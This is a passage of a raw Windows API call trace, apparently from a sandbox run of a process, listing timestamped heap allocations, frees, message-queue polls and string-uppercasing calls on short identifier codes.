lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0211.263] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0211.263] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0211.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0211.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0211.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0211.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0211.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0211.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0211.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0211.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0211.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0211.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0211.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0211.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0211.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0211.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0211.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0211.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0211.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0211.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0211.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0211.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0211.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0211.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0211.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0211.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0211.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0211.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a38 [0211.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0211.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0211.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0211.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0211.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0211.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0211.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0211.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0211.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0211.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0211.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0211.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0211.266] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0211.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0211.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ad8 [0211.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0211.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0211.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b28 [0211.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0211.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0211.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b08 [0211.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0211.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0211.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0211.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a08 [0211.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0211.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0211.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0211.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa68 [0211.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0211.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0211.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0211.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0211.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0211.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0211.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0211.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0211.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0211.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0211.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0211.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0211.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0211.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0211.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0211.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0211.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0211.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0211.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0211.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0211.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0211.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0211.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0211.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0211.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0211.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0211.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0211.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0211.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0211.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0211.268] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0211.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0211.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0211.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0211.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0211.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0211.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0211.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0211.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0211.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0211.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0211.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0211.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0211.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0211.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0211.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0211.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0211.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0211.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0211.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0211.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0211.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0211.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0211.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0211.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0211.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0211.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0211.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0211.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0211.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0211.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0211.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0211.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0211.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0211.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0211.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0211.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0211.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0211.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0211.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0211.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0211.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0211.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0211.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0211.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0211.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0211.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0211.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0211.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0211.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0211.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0211.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0211.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0211.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0211.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0211.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0211.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0211.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0211.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0211.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0211.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0211.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0211.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0211.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0211.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0211.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0211.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0211.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0211.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0211.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0211.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0211.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0211.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0211.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0211.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0211.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0211.272] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0211.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0211.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0211.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa960 [0211.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0211.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0211.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0211.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0211.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0211.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0211.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0211.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0211.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0211.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0211.272] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0211.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0211.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0211.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0211.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0211.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0211.273] HeapFree (in: 